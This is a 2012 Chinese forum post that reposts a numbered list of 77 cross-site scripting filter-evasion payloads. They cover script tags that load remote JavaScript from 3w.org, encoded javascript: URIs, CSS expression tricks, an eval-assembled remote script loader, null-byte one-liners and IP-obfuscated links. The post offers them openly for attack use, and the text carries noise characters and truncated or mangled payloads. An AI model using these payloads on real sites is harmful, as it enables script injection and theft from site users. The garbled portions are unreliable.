貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。) n9 e; i% `) E \
! Z. f% T' l2 g d( H (1)普通的XSS JavaScript注入4 h Y) _7 q4 ?1 @6 R3 M1 U
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>( Z4 \2 l, C3 _! g2 J1 z" n
8 e; r9 X7 ~9 i# e1 z (2)IMG标签XSS使用JavaScript命令
; n, g \* ?" g <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>* s) {+ y- }# }$ T1 M& N
' L) |* [) z2 D0 f1 j) R1 q( c8 d0 C4 C, N
(3)IMG标签无分号无引号
- z0 N& ]& s9 u$ { <IMG SRC=javascript:alert(‘XSS’)>& V: ]5 j; E) F! F. O
2 B; R4 o& F/ v: ?" d f/ C# W
(4)IMG标签大小写不敏感$ q% y" D+ g2 g) S7 N) i6 n
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>7 F) g0 w$ w/ h. r: u8 L- T" F
7 [4 K/ L2 j" z. X% I8 ?: y (5)HTML编码(必须有分号). ?, f6 u6 p5 n) S" C
<IMG SRC=javascript:alert(“XSS”)>
# C( ?# N9 Q( K4 S- ^
0 N# Y v! e" K (6)修正缺陷IMG标签& _' t5 x+ S/ S, P3 N
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>* {% [* H0 L/ f+ d3 F1 S/ o
8 G2 H6 g0 n# i4 H
(7)formCharCode标签(计算器)
, Y9 H. j0 Z: p7 p' L) v <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
; z* _1 s( R; G
, g9 H; s" F0 C. ? (8)UTF-8的Unicode编码(计算器)1 B1 ~, @5 Y3 T: l w: o% B. z
<IMG SRC=jav..省略..S')>
! I ]% P" L$ R, n, E) W* ]' H+ F! G, n: _
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
! D3 `$ E0 F F2 A& B1 T <IMG SRC=jav..省略..S')> n. A! i5 l6 \2 J- s) p8 g8 T) t
2 S6 L4 F3 Q# s. e
(10)十六进制编码也是没有分号(计算器)
: D2 |0 M4 k+ n$ {) x2 i( c <IMG SRC=java..省略..XSS')>
! Q% p4 ~- D/ a* l- u! o* \1 e: h
' `7 k( M) L+ n (11)嵌入式标签,将Javascript分开
9 F+ r, h+ G- j9 F. H2 O <IMG SRC=”jav ascript:alert(‘XSS’);”>- \# H- O' }; P
6 c8 m9 L" l s" U; P (12)嵌入式编码标签,将Javascript分开" @. B% s4 B& j3 g: `7 [- Q
<IMG SRC=”jav ascript:alert(‘XSS’);”>: j; G; P9 i- ^# U2 E4 ]. d4 G) p
5 i0 m1 I8 o/ c! e
(13)嵌入式换行符
8 ^6 Q s, F1 F" D5 ? <IMG SRC=”jav ascript:alert(‘XSS’);”>$ t5 @+ y- S! |7 D
: w6 |& A! Q7 e/ P+ l5 |
(14)嵌入式回车8 t0 [* Z. c) R( H
<IMG SRC=”jav ascript:alert(‘XSS’);”>
! k! ?, c4 ^) V" E: G+ R
5 r0 |8 T9 L- v; Q w1 H (15)嵌入式多行注入JavaScript,这是XSS极端的例子$ S8 U! l+ W1 S+ @; C$ P# w
<IMG SRC=”javascript:alert(‘XSS‘)”>; j2 o6 l* ^- J0 X4 B& U) O" L
& L1 }. c( L' A, X$ [ (16)解决限制字符(要求同页面)
4 e0 e* R- ]3 m; R, } ` <script>z=’document.’</script>, |" {7 t2 g3 W8 G/ c. l
<script>z=z+’write(“‘</script>
0 h7 x4 @0 n+ g' e0 Y <script>z=z+’<script’</script>& Z+ x# E6 A* }$ q' M
<script>z=z+’ src=ht’</script>0 C# n" }# R8 H" Z- I
<script>z=z+’tp://ww’</script>
, \( z& k l% {: C& F# {3 k+ G1 G <script>z=z+’w.shell’</script>
`! R( t* r8 n4 T' M) l <script>z=z+’.net/1.’</script># R& U0 d& [6 K; M) D
<script>z=z+’js></sc’</script>
* |+ [7 z; a4 B& E- |! Y# E <script>z=z+’ript>”)’</script>
% O7 R! I0 B. W' ` <script>eval_r(z)</script>( L' Y$ l, t5 [+ E! q+ z
& j- D. \* b8 ?+ ]3 p4 p3 l (17)空字符
4 I' E: M! ]2 v$ [$ ?9 A8 q9 k! c+ a perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
6 i( h" M. g- I: u* L
( w4 p& a* g. J6 _0 s" | (18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
4 W# ?* p$ a B perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out# h; x/ D' j! P. Z# [
7 w/ M7 m1 g4 u5 \, E" ~ (19)Spaces和meta前的IMG标签
5 Q5 o' ]8 N1 q1 X$ h5 k8 i0 v <IMG SRC=” � javascript:alert(‘XSS’);”>
: v, E1 R$ Z' S; h( {3 V0 w( a0 n* e" d; c+ z3 V
(20)Non-alpha-non-digit XSS
8 D! t+ K7 A) M' u% I0 U2 ~ <SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
& j' F8 a( y1 t0 z9 p3 @' {3 Q4 X
- B1 [' a" g! L' N' m1 n (21)Non-alpha-non-digit XSS to 2
$ ^+ O6 p0 \! S. c" E <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>$ F4 [1 q3 m6 b* L$ F
' n. Z( ?7 y2 |5 i0 |2 m: c (22)Non-alpha-non-digit XSS to 33 U0 X, L8 S/ i
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
q: _: \6 B% A; q1 ]( x7 o! X
3 `; Y1 j; |! C. C (23)双开括号
9 G5 k8 r: m8 x- l* S6 R' O <<SCRIPT>alert(“XSS”);//<</SCRIPT>1 k" n# S( ?* {9 L
) ^% s7 p, I$ z, D" \) X0 H (24)无结束脚本标记(仅火狐等浏览器)$ q6 A" e: Y/ b& B; |
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>: J3 _# F' \0 J+ A. @. H
; x; F8 \$ C' E. _1 T (25)无结束脚本标记23 l7 J$ P/ P6 B- N
<SCRIPT SRC=//3w.org/XSS/xss.js>6 ]* K* T/ ?$ d. Y: S
% I- H+ S( C# B# \+ d) S p
(26)半开的HTML/JavaScript XSS
7 W& {6 i. f1 P) d l# K4 O <IMG SRC=”javascript:alert(‘XSS’)”$ |; O* h& [+ F
0 A! F: o( m( y4 g5 W9 S$ i4 s4 J
(27)双开角括号; M0 f+ n f" w5 y
<iframe src=http://3w.org/XSS.html <
- C- i q& s7 p( ?+ l* f
5 _4 c1 l7 Q9 r% H (28)无单引号 双引号 分号7 d5 o2 X: J( u5 d0 p5 g8 o
<SCRIPT>a=/XSS/
6 J' [3 r2 y9 X" C9 h* H alert(a.source)</SCRIPT>
0 {/ v" p2 s: B4 _& e9 @$ `* x5 ~! f
4 F+ L( y( u! S, J (29)换码过滤的JavaScript! c2 v* z3 k A% f9 H6 Z
\”;alert(‘XSS’);//8 Z) f' `9 W4 d8 T) K$ e
8 ?' O% J# M/ R- t+ m- z4 `9 p (30)结束Title标签
1 H z8 J9 b$ W' T, L </TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
1 p# f6 u7 _5 p7 ]& r
0 c5 S+ X/ r t" R& d (31)Input Image. D: O2 b3 I: E) A" w$ L2 }
<INPUT SRC=”javascript:alert(‘XSS’);”>
% A- W; T2 I: o
2 U L$ p8 ~% f- F k, d. G (32)BODY Image5 O N- U+ a3 l# f
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
, @3 D# P& j7 z4 d; S; @3 b0 z( S$ g: q' F. Y2 X( y% x8 P+ \6 D- P0 Z* @% \
(33)BODY标签
6 G- q3 Z5 }# L8 P <BODY(‘XSS’)>: R4 y" l! C2 T% {) |- l! \
2 N4 M$ e* u3 `4 ^
(34)IMG Dynsrc
7 h2 ^; a( e$ j; w6 t& O ]0 ~5 { <IMG DYNSRC=”javascript:alert(‘XSS’)”>
0 Y; r. l% u# `+ _1 p0 c) ]# c4 F9 ~7 K2 d
(35)IMG Lowsrc6 u0 F6 }9 R4 C- f8 }' f5 a0 W# S( @
<IMG LOWSRC=”javascript:alert(‘XSS’)”>% h( A- A# L& s+ i
% I9 C8 W/ Z- P, Z' I1 ^, A, B' h
(36)BGSOUND1 f$ j8 g! C/ k8 ^9 u1 k
<BGSOUND SRC=”javascript:alert(‘XSS’);”>6 A& k$ m( `5 K1 O
- c: F3 P/ J# E1 J) B7 @
(37)STYLE sheet% s) p5 W4 t$ u" r. a3 q
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>/ Y8 G% ]+ z. Q! Y3 v) q- m
$ g5 \; u! ~: a (38)远程样式表" p7 l5 d5 p$ d5 W/ m4 m- G V
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>: e+ J. j/ B, z0 N
" b7 p: X3 ~9 [# f0 B (39)List-style-image(列表式)
' E: i5 l" R) Y% j, Q q <STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
5 ^' W6 E# L+ F# l! N4 g" _, f; z
(40)IMG VBscript
' ~4 U, r9 N3 }3 D6 p l' D8 \ <IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
1 m* A. a" x" z8 k' A. J: G$ s8 Y) {
(41)META链接url! M) N* ^$ ~6 ?+ O0 h& B( V) K" K- K L/ n
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>+ k7 j* E0 D* f2 u( f
; a0 p+ D" }- P1 m
(42)Iframe2 _. Y, g( ]8 a) u* z! @
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
+ \+ `( j9 ]$ Z* R
0 K0 h. g" k0 F6 f (43)Frame3 c; [7 e: R1 m7 z" c
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
' l. t4 x$ @, u5 L$ L; c* m! N# d0 M3 |% K0 E" g
(44)Table
1 ^5 t4 y+ G# u <TABLE BACKGROUND=”javascript:alert(‘XSS’)”>9 G+ f' \4 i2 D; u; o" f
3 D3 F* Q: l4 i: L3 F# V
(45)TD8 E; V n8 N) ]0 a8 x4 g" p- B) D
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>6 A/ [) I# E( H8 R/ W5 B. X: y
1 D. |& v' S+ Z8 ]7 l2 M, y
(46)DIV background-image
+ X( N4 P* d* f' U: E" B2 s <DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
! X9 Y9 }( ~( G& Z* R) S/ r7 B+ M4 Q" q7 s8 s6 |. [
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279); n* O$ f$ v; a0 Q; d
<DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”>
1 Z8 H+ m' ~" ?+ V! f$ P$ B D3 R9 C9 V( z j3 e
(48)DIV expression
; x7 F6 B; K$ F2 E* S. X! n4 C& k! U <DIV STYLE=”width: expression_r(alert(‘XSS’));”>! a7 a: D2 d: s! i% ~" {0 M
( q+ `( u6 s' w: L (49)STYLE属性分拆表达
h5 R, \# U8 X8 ] j7 M! Y7 u <IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
4 }8 [2 l* b, c& p
; H: A0 ]) u: x- [) Z! X0 F (50)匿名STYLE(组成:开角号和一个字母开头)' F. o( D5 f& a% |$ \) y( {
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
+ q: a3 r. @8 ?8 E, \6 z6 Q
; t( t: G0 l" H0 ^- \1 ^6 U# u/ Q) Z (51)STYLE background-image* E# R% Y: a' h! h
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>" v% k* n( t7 h) s; U9 r
0 A/ P6 b- X& l: n (52)IMG STYLE方式
' X k, @8 L/ h4 [# Q8 u! Y exppression(alert(“XSS”))’># T. \0 ^) K# b* W! S# ^9 r
* I: @8 o* b7 b" H0 N4 @0 b% v
(53)STYLE background
9 Z8 I0 e: u0 z7 c# x) l# [" ? <STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>0 Y% {" A6 a$ O' H W
) j D+ l6 e# m# v5 P6 j* y (54)BASE
) ~$ g! L3 X. i2 `. Y/ `% r <BASE HREF=”javascript:alert(‘XSS’);//”>; u" y* j. j2 k" n- y) I
, i! `) a* t9 w/ q/ E, {
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS8 Z4 D8 g. d B& [% O Q) ~. E
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>( M- V0 a4 V* w9 P6 l* F( M
$ c4 P# l- V+ W7 f$ D
(56)在flash中使用ActionScrpt可以混进你XSS的代码' }, a3 N4 a( [+ ^
a=”get”;8 n6 z j! B! B9 X
b=”URL(\”";
" s9 ?- \' Y' f; F" a* P5 \# | c=”javascript:”;* R% [6 N6 D) V& l R2 F
d=”alert(‘XSS’);\”)”;. s; @6 I) e/ \8 c
eval_r(a+b+c+d);
5 H" W1 X2 q% V" l: W0 o% ^, T6 I- B+ q# I4 {7 _! I$ b8 a
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
( F- P$ K- [% C* W0 b' a$ B/ @ <HTML xmlns:xss>: l5 ~: s0 [* {& K
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>7 f9 L0 D( b5 S& D& b
<xss:xss>XSS</xss:xss>
0 w& Y2 k ^# B2 `7 e+ F4 a1 t" a </HTML>
5 i ]* q' e, q1 D: d' T* ~, R t: Z0 n" [7 ?$ d
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
, B W* A2 r- Z7 T( c <SCRIPT SRC=””></SCRIPT>' b; m! n3 }5 a4 V
8 l X* L _3 p! t+ _6 q (59)IMG嵌入式命令,可执行任意命令
$ ^$ H$ N/ j1 ?/ t- q <IMG SRC=”http://www.XXX.com/a.php?a=b”># J- U8 o- Q5 {3 s
! j: O7 _( S" ^, J7 S) B, ^, P) c4 a* ^
(60)IMG嵌入式命令(a.jpg在同服务器)2 ]" ^1 t& s" {* h1 l/ h
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser" E3 j( ]8 y6 U( G( E% _- f' u( J
/ |, n+ m+ Y; h* Q2 n, |. G (61)绕符号过滤. v( e c. R" I% }6 ^4 X
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
: r8 X; X( E9 z$ t* n5 k# t) x$ `
" w3 g- p4 ~; Z- @( O (62)8 v9 l- _ `4 b; z5 x
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>% a5 E9 w K7 J, g# \4 j# T
8 n( h2 k; z+ W6 N: L9 k+ e (63)
$ o+ ?( Y0 J0 x8 |1 Z7 R <SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
6 d m) S, V3 E7 R+ y# U$ ]$ A0 v* e @
(64)/ T* P3 ?' B4 J8 I* O. Q
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
u( F: T# G6 J; i e( B# M8 }. r. s5 Y+ x# Y1 Y5 O8 j
(65)* R* r2 o9 X8 N* _
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
+ d; w8 d9 V% F k5 b% ?
; D- w3 {- |/ J( L$ U. p# w (66)9 O$ ?: I& T3 }6 c
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>) L2 a4 X* w, `, e9 {' ?0 y
9 o8 J$ H0 h2 v2 V (67)
) W& y8 ~, c. j6 ]0 I7 T0 o. } <SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>
8 T6 `, d4 F0 [$ a/ m) T0 f# `9 i$ ~' k; Y. K
(68)URL绕行
0 D# a7 ]3 ]3 C( ]+ \' J L <A HREF=”http://127.0.0.1/”>XSS</A>" I* \9 B K: K& h1 q5 C
+ W7 z5 W& X) T
(69)URL编码/ {4 v" a3 p5 t
<A HREF=”http://3w.org”>XSS</A>$ P+ P. p, q7 S
; \( A7 H4 C2 g$ t4 B! o
(70)IP十进制
8 B) R5 W; l; a <A HREF=”http://3232235521″>XSS</A>2 Y) ]3 G( S/ V1 z1 e
0 T& U; u* \7 v) I3 R1 s
(71)IP十六进制
T$ R, W" o3 x/ m <A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>2 q7 u" H+ t9 S% D) m
% X0 m5 I5 _$ e: f4 E, m; f (72)IP八进制
9 m: R8 _' n v; Y: [ <A HREF=”http://0300.0250.0000.0001″>XSS</A>
! u8 E4 Q k! @8 c+ I; s$ T" R: H: l% o
(73)混合编码; ?; @8 k! z, m1 L
<A HREF=”h
; D& [0 A, S p( `$ D9 I1 D& k X tt p://6 6.000146.0×7.147/”">XSS</A>
1 {. y( h6 G! Y6 E | N2 X1 L2 n! h7 x# `. o5 j& E
(74)节省[http:]
: M1 [+ @/ B: w5 s <A HREF=”//www.google.com/”>XSS</A>
& s4 U4 L4 A9 T3 F' N$ U4 }
& ~, q% P7 ~" e; n3 I0 e (75)节省[www]' j2 g6 G1 `( b) e- G' F
<A HREF=”http://google.com/”>XSS</A>) v& x9 e4 q6 E) X) j
8 c/ `4 F: y" |0 l (76)绝对点绝对DNS
O0 W6 S) U, M9 ? <A HREF=”http://www.google.com./”>XSS</A>- |5 I0 F. u0 p' w% L. m
' }- A6 T8 r1 m# q (77)javascript链接
$ Q$ H) M4 X' e8 A1 B2 v <A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A> |
发表于 2012-9-5 14:56:34
收藏
支持
反对